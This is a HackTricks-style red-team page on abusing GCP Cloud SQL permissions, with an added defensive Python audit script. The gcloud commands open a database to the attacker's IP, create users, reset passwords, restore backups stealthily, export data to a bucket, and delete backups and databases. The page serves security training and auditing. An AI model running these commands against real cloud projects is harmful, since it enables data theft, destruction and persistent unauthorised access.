{% hint style="success" %}
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
{% endhint %}
For more information about Cloud SQL check:
{% content-ref url="../gcp-services/gcp-cloud-sql-enum.md" %} gcp-cloud-sql-enum.md {% endcontent-ref %}
To connect to the databases you only need access to the database port and a valid username and password; there are no IAM requirements. So, if the database has a public IP address, an easy way to get access is to update the allowed networks so that your own IP address is permitted.

```bash
# Use --assign-ip to make the database get a public IPv4
gcloud sql instances patch $INSTANCE_NAME \
    --authorized-networks "$(curl ifconfig.me)" \
    --assign-ip \
    --quiet

mysql -h <ip_db> # If mysql

# With cloudsql.instances.get you can use gcloud directly
gcloud sql connect mysql --user=root --quiet
```
It's also possible to use `--no-backup` to disrupt the backups of the database.
As these are the requirements, I'm not completely sure what the permissions `cloudsql.instances.connect` and `cloudsql.instances.login` are for. If you know, send a PR!
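The instance changes described above (`--assign-ip`, `--authorized-networks`, `--no-backup`) all leave a trace in the instance configuration, so a defender can audit for them. The following is an added example, not HackTricks code: it checks the JSON produced by `gcloud sql instances list --format=json`; the sample data, instance names and the `APPROVED` list are constructed assumptions.

```python
import ipaddress
import json

# Constructed sample in the shape of `gcloud sql instances list --format=json`
# (Cloud SQL Admin API instance resource); names and addresses are made up.
SAMPLE = json.loads("""[
  {"name": "orders-db",
   "settings": {"ipConfiguration": {"ipv4Enabled": true,
       "authorizedNetworks": [{"name": "office", "value": "198.51.100.0/24"},
                              {"name": "tmp", "value": "192.0.2.77"}]},
     "backupConfiguration": {"enabled": false}}},
  {"name": "internal-db",
   "settings": {"ipConfiguration": {"ipv4Enabled": false},
     "backupConfiguration": {"enabled": true}}}
]""")

# Assumption: the networks your organisation has approved for database access.
APPROVED = [ipaddress.ip_network("198.51.100.0/24")]


def audit_instance(inst, approved=APPROVED):
    """Return findings for one instance: public IP, unapproved networks, no backups."""
    findings = []
    settings = inst.get("settings", {})
    ipcfg = settings.get("ipConfiguration", {})
    if ipcfg.get("ipv4Enabled"):
        findings.append("public IPv4 enabled")
    for net in ipcfg.get("authorizedNetworks", []):
        cidr = ipaddress.ip_network(net["value"], strict=False)
        if cidr.prefixlen == 0:
            findings.append(f"authorized network {cidr} is open to the internet")
        elif not any(cidr.version == a.version and cidr.subnet_of(a) for a in approved):
            findings.append(f"authorized network {cidr} is not on the approved list")
    if not settings.get("backupConfiguration", {}).get("enabled"):
        findings.append("automated backups disabled")
    return findings


def audit(instances, approved=APPROVED):
    """Map instance name -> findings, omitting instances with no findings."""
    report = {i["name"]: audit_instance(i, approved) for i in instances}
    return {name: f for name, f in report.items() if f}


if __name__ == "__main__":
    for name, findings in audit(SAMPLE).items():
        print(name, findings)
```

To run it against a real project, replace `SAMPLE` with the parsed output of `gcloud sql instances list --format=json` and set `APPROVED` to your own ranges.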
Get a list of all the users of the database:

```bash
gcloud sql users list --instance <instance-name>
```
This permission allows creating a new user inside the database:

```bash
gcloud sql users create <username> --instance <instance-name> --password <password>
```
This permission allows updating a user inside the database. For example, you could change its password:

{% code overflow="wrap" %}
```bash
gcloud sql users set-password <username> --instance <instance-name> --password <password>
```
{% endcode %}
Backups might contain old sensitive information, so it's interesting to check them.

Restore a backup inside a database:

```bash
gcloud sql backups restore <backup-id> --restore-instance <instance-id>
```

To do it in a stealthier way, it's recommended to create a new SQL instance and recover the data there instead of in the currently running databases.
This permission allows deleting backups:

```bash
gcloud sql backups delete <backup-id> --instance <instance-id>
```
Export a database to a Cloud Storage Bucket so you can access it from there:

```bash
# Export sql format, it could also be csv and bak
gcloud sql export sql <instance-id> <gs://bucketName/fileName> --database <db>
```
Import a database (overwrite) from a Cloud Storage Bucket:

```bash
# Import format SQL, you could also import formats bak and csv
gcloud sql import sql <instance-id> <gs://bucketName/fileName>
```
Delete a database from the db instance:

```bash
gcloud sql databases delete <db-name> --instance <instance-id>
```